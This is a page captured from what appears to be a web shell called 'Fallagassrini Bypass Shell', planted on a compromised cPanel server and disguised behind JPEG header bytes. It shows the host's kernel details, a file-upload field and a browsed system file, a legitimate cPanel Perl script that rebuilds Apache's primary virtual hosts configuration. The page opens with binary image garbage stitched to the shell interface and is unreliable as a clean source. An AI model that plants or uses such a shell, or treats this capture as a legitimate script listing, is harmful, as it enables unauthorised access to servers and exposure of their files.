JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /scripts/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : //scripts/primary_virtual_host_migration

#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/primary_virtual_host_migration  Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

#----------------------------------------------------------------------
# NOTE: This script recreates the primary_virtual_hosts.conf file from
# httpd.conf. THIS IS BACKWARDS from the normal order of things; ordinarily,
# we rebuild httpd.conf from primary_virtual_hosts.conf (and userdata);
# however, this script is around for migration and repair.

use strict;
use warnings;

use Cpanel::Locale                              ();
use Cpanel::Config::Httpd::IpPort               ();
use Cpanel::HttpUtils::Vhosts::Primary          ();
use Cpanel::HttpUtils::Vhosts::Primary::Extract ();

sub script {
    my $pvh_file = $Cpanel::ConfigFiles::APACHE_PRIMARY_VHOSTS_FILE;

    if ( -f $pvh_file && !-z _ ) {
        my $locale = Cpanel::Locale->get_handle();
        die $locale->maketext(
            'The primary virtual hosts file ([_1]) already exists. If you really want to rebuild this file from [asis,Apache]’s configuration, you must delete this file first. [output,strong,Unless you are doing a migration or a repair~, however~, this is probably not what you want to do.] Ordinarily, [asis,Apache]’s configuration is built from the primary virtual hosts file, not the other way around.',
            $pvh_file,
        );
    }

    my $primary_obj = Cpanel::HttpUtils::Vhosts::Primary->new();

    my ( $ok, $primary_hr ) = Cpanel::HttpUtils::Vhosts::Primary::Extract::extract_primary_vhosts_from_apache_conf();
    die $primary_hr if !$ok;

    my $ssl_port = Cpanel::Config::Httpd::IpPort::get_ssl_httpd_port();

    for my $ip_port ( keys %$primary_hr ) {
        my ( $ip, $port ) = split m{:}, $ip_port;
        next if $ip eq '*';

        if ( $port eq $ssl_port ) {
            $primary_obj->set_primary_ssl_servername( $ip, $primary_hr->{$ip_port} );
        }
        else {
            $primary_obj->set_primary_non_ssl_servername( $ip, $primary_hr->{$ip_port} );
        }
    }

    my ( $save_ok, $save_msg ) = $primary_obj->save();
    die $save_msg if !$save_ok;
    my ( $close_ok, $close_msg ) = $primary_obj->close();
    die $close_msg if !$close_ok;

    return;
}

__PACKAGE__->script(@ARGV) if !caller;

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net